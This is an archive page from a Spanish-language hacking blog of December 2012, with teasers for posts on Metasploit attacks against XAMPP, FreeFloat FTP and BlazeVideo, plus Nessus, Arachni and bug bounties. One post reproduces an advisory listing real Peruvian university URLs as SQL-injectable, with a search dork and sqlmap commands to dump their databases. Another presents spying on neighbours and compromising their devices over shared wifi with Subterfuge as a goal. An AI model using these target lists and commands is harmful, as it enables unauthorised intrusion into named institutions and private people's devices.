lunes, 31 de diciembre de 2012

¡Feliz Año Nuevo para todos mis fieles lectores!




Que el 2013 este lleno de amor, paz, felicidad, salud, trabajo, buena música buenos amigos, esperanza y fe.

Feliz Año Nuevo a todos.

jueves, 20 de diciembre de 2012

[Metasploit] Hackeando XAMPP Remotamente (Windows XP - 7 - 8)



------------------------------------------------------------------------------------------------------------------
XAMPP es una forma fácil de instalar la distribución Apache que contiene MySQL, PHP y Perl. XAMPP es realmente simple de instalar y usar - basta descargarlo, extraerlo y comenzar.

La distribución de Windows 2000, 2003, XP, Vista y 7 contiene Apache, MySQL, PHP + PEAR, Perl, mod_php, mod_perl, mod_ssl, OpenSSL, phpMyAdmin, Webalizer, Mercury Mail Transport System for Win32 and NetWare Systems v3.32, Ming, FileZilla FTP Server, mcrypt, eAccelerator, SQLite, and WEB-DAV + mod_auth_mysql.
------------------------------------------------------------------------------------------------------------------

lunes, 17 de diciembre de 2012

Peruvian Universities - MS Access/SQL Injection Vulnerabilities



+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# Exploit Title : Peruvian Universities - MS Access/SQL Injection Vulnerabilities
# Date : 16-12-2012
# Author        : Caleb Bucker (Independent Security Researcher)
# Contact       : https://twitter.com/CalebDrugs
# Website : www.calebbucker.blogspot.com
# Category : WebApps
# Google Dork : ".php?id= site:edu.pe" or ".asp?id= site:edu.pe"
# Tested on:    : BackTrack 5 R3
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] ANALIZING:

# http://www.site-web.edu.pe/[PATH].php?id='     [SQL Injection]
# http://www.site-web.edu.pe/[PATH].asp?id='     [MS Access Injection]
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] DETECTING VULNERABILITY:

# You have an error in your SQL syntax;             [SQL Injection]
# Microsoft OLE DB Provider for SQL Server error '80040e14'  [MS Access Injection]
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] VULNERABLE FILES:

# noticias.php? detalle.asp? index.php? interno.php?
# informacion.php? egresados.php? contacto.php? encuesta.asp?
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] EXAMPLE SITES VULNERABLE:

# http://www.uap.edu.pe/convenios/detalle.asp?cod=1'
# http://www.umch.edu.pe/interno.php?id=46'
# http://www.utp.edu.pe/noticias.aspx?idNoti=1'
# http://www.ipp.edu.pe/listado.php?cat=1'
# http://www.udch.edu.pe/web/egresados.php?e=1'
# http://www.cientifica.edu.pe/noticias/noticias.asp?id=1327'
# http://www1.up.edu.pe/servicios/sitios/contacto.php?id=3'
# http://www.sistemasuni.edu.pe/encuesta/encuesta.asp?id_encuesta=372&pregunta=1'
# http://envivo.universia.edu.pe/detalle_empleo.php?id=8608'
# http://www.pucp.edu.pe/content/pagina14.php?pIDSeccionWeb=6&pID=915'
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] EXPLOITING SITES VULNERABLE WITH SQLMAP:

# ./sqlmap.py -u http://www.uap.edu.pe/convenios/detalle.asp?cod=1 --dbs
# ./sqlmap.py -u http://www.cientifica.edu.pe/noticias/noticias.asp?id=1327 --dbs
# ./sqlmap.py -u "http://www.sistemasuni.edu.pe/encuesta/encuesta.asp?id_encuesta=372&pregunta=1" -p "pregunta" --dbs
# ./sqlmap.py -u "http://www.pucp.edu.pe/content/pagina14.php?pIDSeccionWeb=6&pID=915" -p "pID" --dbs
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] SCREENSHOT:

# http://img213.imageshack.us/img213/269/inject.png
# http://img109.imageshack.us/img109/8761/inject2.png
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] ACCESS INTRANET - LOGIN:

# http://www.site-web.edu.pe/intranet/
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

# Greet'z | @Pwnakil | @CLsecurity2011 & All my friend

More Info: http://packetstormsecurity.org/files/118888/Peruvian-Universities-SQL-Injection.html

Nessus y su Interfaz Gráfica en HTML5




Desde mucho tiempo la interfaz de Nessus ha estado usando Flash, que tiene una serie de ventajas como una plataforma de desarrollo, pero también tiene una gran cantidad de inconvenientes. Una de las razones que la Tenable Network ha implementado una interfaz de Flash para Nessus era que Flash "se comporta igual en todos los navegadores" (que resulta que no siempre es el caso), y era bastante rápido para ejecutar el cliente. Pero desde hace poco la Tenable Nework ha optado por utilizar una tecnología basada en estándares, y se ha movido hacia HTML5.

Para ello se ha lanzado la interfaz de HTML5 en versión beta, pero la interfaz por defecto de Nessus seguirá siendo flash por ahora, pero si nos conectamos al escanner utilizando un navegador que no tiene Flash instalado, o si vamos directamente a la URL correcta, tenemos la opción de utilizar la versión beta del cliente de HTML5.

jueves, 13 de diciembre de 2012

[Arachni Framework] Una forma diferente de Escanear y Auditar Servidores Web




En términos muy simples, Arachni es una herramienta que permite evaluar la seguridad de las aplicaciones web. En términos menos simples, Arachni es una herramienta modular Open Source de alto rendimiento.

Es un sistema que comenzó como un ejercicio educativo y como medio para realizar pruebas de seguridad específicas en contra de una aplicación web con el fin de identificar, clasificar y registrar los temas de interés de seguridad.

Ahora se ha convertido en una infraestructura fiable que puede realizar cualquier tipo de auditorias en aplicaciones web relacionada con la seguridad y el raspado de datos generales.

[Metasploit] Atacando Windows mediante FreeFloat FTP Server Arbitrary File Upload




------------------------------------------------------------------------------------------------------------------
FreeFloat FTP Server es, como su nombre indica, una aplicación que nos permite compartir archivos y carpetas en la red. Toda la partición donde se inicia la utilidad es compartida por defecto. No se requiere la autenticación de usuario y el puerto predeterminado se puede cambiar, según nuestras necesidades.
------------------------------------------------------------------------------------------------------------------

Este Software actualmente ha sido vulnerado y permite a cualquier atacante penetrar cualquier Sistema Operativo Windows XP o 7 que tenga instalado y ejecutando dicho programa.

El modulo que se integro en Metasploit para explotar esta vulnerabilidad se aprovecha de diversos problemas en FreeFloat las cuales son:

  • No integra credenciales que se necesitan realmente para ingresar.
  • La ruta de los usuarios por defecto se encuentra en C:\ y esto no se puede cambiar.
  • El usuario puede escribir en cualquier parte del sistema de archivos del servidor.

Como resultado de estas implementaciones pobres, un usuario malintencionado puede simplemente entrar y luego cargar cualquier tipo de archivos.

Para explotar esta vulnerabilidad desde el Metasploit, los pasos son los siguientes:

miércoles, 12 de diciembre de 2012

Espiando a nuestros Vecinos y Hackeandole el Sistema mediante Subterfuge


Anteriormente había realizado un post donde muestro el funcionamiento de Subterfuge - Attack Framework, una herramienta para realizar Main in the Middle Attack y poder coger toda la información sobre las computadores conectadas en nuestra red.

Esta vez mostrare unos pequeños pasos sobre como obtener información confidencial y explotar totalmente el Sistema Operativo de las Computadoras, Iphone y Tablets conectadas en nuestra red, ya que hoy en día la mayoría de personas son tan amables que nos brindan su Wifi totalmente gratis, sin saber que nosotros podemos llegar a penetrar su sistema con tan solo enviarle unos simples exploits gracias a Subterfuge.

En la suite de BackTrack 5 r3 esta herramienta se integra por default y se puede utilizar con tan solo teclear subterfuge en la consola y luego abrir el localhost (127.0.0.1) desde nuestro navegador para apreciar la interfaz gráfica con todas las opciones para llevar a cabo nuestro ataque hacia las personas que estén conectadas en la misma red Wifi que nosotros.

martes, 11 de diciembre de 2012

Lista de Programas Bug Bounty (Ganando Dinero por reportar Vulnerabilidades)




Bug Bounty Program es un tema muy conocido que manejan las compañías conocidas como: Google, Facebook, Mozilla, etc, la cual se basa en realizar un pago considerable a los "Hackers" o "Security Research" por encontrar y reportar cualquier tipo de vulnerabilidad en sus servidores web, productos, servicios o algunas aplicaciones asociadas. 


Mayormente este programa los emplean las grandes empresas y sitios webs como también las empresas que desean mejorar su seguridad con el fin de brindar un mejor servicio a sus clientes, para tal caso listare la información respectiva que brindan las empresas con mas influencia en la red para reportar las vulnerabilidades que podamos encontrar al momento que estemos realizando nuestras auditorias.

sábado, 1 de diciembre de 2012

Exploiting Windows 8 - 7 with BlazeVideo HDTV Player Pro v6.6 Filename Handling Vulnerability




BlazeVideo HDTV Player es una completa herramienta de reproducción de vídeo que permite no sólo disfrutar de nuestras películas favoritas en DVD, sino también sintonizar televisión de alta definición a través de la tarjeta sintonizadora de TV. El programa esta disponible para Windows 8 - 7 y es usado por muchos usuarios que se dedican al mundo de la multimedia en Internet ya que cuenta con una elegante interfaz personalizable mediante skins, muy intuitiva y de sencillo manejo. 

Como todo buen programa, los investigadores de seguridad siempre se toman un poco de tiempo para realizarle un análisis de seguridad con el fin de conseguir un agujero que nos permita vulnerar el programa y aprovecharnos del sistema operativo en la cual se encuentra instalado.

Tal es el caso, que el día 30 de Noviembre, se reporto una vulnerabilidad en dicho programa denominado BlazeVideo HDTV Player Pro v6.6 Filename Handling Vulnerability, la cual  como es de costumbre y conocimiento, inmediatamente se integro en los módulos de Metasploit 

El módulo se aprovecha de una vulnerabilidad encontrada en la rutina de manejo de BlazeVideo HDTV Player. Al suministrar una serie de datos de entrada incrustado en un archivo .plf, el componente MediaPlayerCtrl.dll intentará extraer un nombre de archivo usando PathFindFileNameA(), y luego copia lo que el valor de retorno está en la pila mediante el uso de inline strcpy. Como resultado, si los datos de entrada es lo suficientemente largo, puede causar un desbordamiento del búfer basado en la pila, lo que puede provocar la ejecución de código arbitrario en el contexto del usuario.